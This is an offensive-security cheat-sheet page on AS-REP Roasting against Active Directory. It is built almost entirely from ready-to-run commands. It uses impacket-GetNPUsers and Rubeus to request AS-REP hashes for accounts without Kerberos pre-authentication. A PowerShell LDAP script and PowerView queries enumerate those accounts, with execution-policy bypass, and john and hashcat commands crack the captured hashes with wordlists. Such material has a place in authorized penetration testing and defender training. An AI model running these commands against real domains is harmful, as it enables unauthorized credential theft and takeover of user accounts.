> For the complete documentation index, see [llms.txt](https://h3ckt0r.gitbook.io/0xsec/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://h3ckt0r.gitbook.io/0xsec/elite/network-pentest/active-directory/ad-techniques/domain-privesc/as-rep-roasting.md).

# AS-REP Roasting

## ASREPRoast

<figure><img src="/files/mLwrdKxvSkNrlDhD0MpC" alt=""><figcaption><p>auth rep</p></figcaption></figure>

{% hint style="warning" %}
If a user's UserAccountControl settings have "Do not require Kerberos pre-authentication" enabled, i.e., Kerberos auth disabled, it is possible to grab the user's crackable AS-REP and brute-force it offline.
{% endhint %}

### **Linux**

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>#WithOut User
</strong><strong>impacket-GetNPUsers  jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
</strong></code></pre>

<figure><img src="/files/FAhiAHdtphYMuUGyLL1p" alt=""><figcaption></figcaption></figure>

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong>#Using User
</strong><strong>impacket-GetNPUsers jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
</strong></code></pre>

Crack using hashcat Or john

### **Windows**

```bash
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
```

### Enumeration

```powershell
Get-NetUser -PreauthNotRequired 
Get-DomainUser -PreauthNotRequired -Verbose
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True}
```

> Powershell script to know users have weak config (<mark style="color:red;">**Don't req preAuth**</mark>)
>
> {% code title="preAuthRoasting.ps1" %}
>
> ```powershell
> $strFilter = “(&(objectCategory=User)(userAccountControl:1.2.840.113556.1.4.803:=4194304))”
> $objDomain = New-Object System.DirectoryServices.DirectoryEntry
> $objSearcher = New-Object System.DirectoryServices.DirectorySearcher
> $objSearcher.SearchRoot = $objDomain
> $objSearcher.Filter = $strFilter
> $objSearcher.SearchScope = “Subtree”
> $colProplist = “name”
> foreach ($I in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
> $colResults = $objSearcher.FindAll()
> $colResults | Format-Table
> ```
>
> {% endcode %}
>
> ```powershell
> #Use ASREPRoast
> powershell.exe -ep bypass
> import-moudle .\preAuthRoasting.ps1
> Invoke-ASREPRoast -Verbose
> Invoke-ASREPRoast -Domain wargrey.mon -Server 192.168.1.50 | select -expand Hash
> ```

### Impacket

```bash
impacket-GetNPUsers hacktor.local/ -usersfile <userfile> -dc-ip 192.168.1.50
john --wordlist=words.txt hash.txt

impacket-GetNPUsers services.local/ -usersfile users.txt -request -format hashcat -outputfile asreproast.txt -dc-ip 10.10.175.105 
#crack Using John
#windows env
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
#Linux env
john --wordlist=/usr/shere/wordlists/rockyou hash.txt 
#OR https://hashcat.net/wiki/doku.php?id=<Algo-Number>
hashcat -m <Algo-Number> hash.txt /usr/share/wordlists/rockyou.txt --show


```

Resources

{% embed url="<https://blog.harmj0y.net/activedirectory/roasting-as-reps/>" %}

{% embed url="<https://blog.xpnsec.com/kerberos-attacks-part-2/>" %}

{% embed url="<https://github.com/jwardsmith/Active-Directory-Exploitation#asreproast>" %}
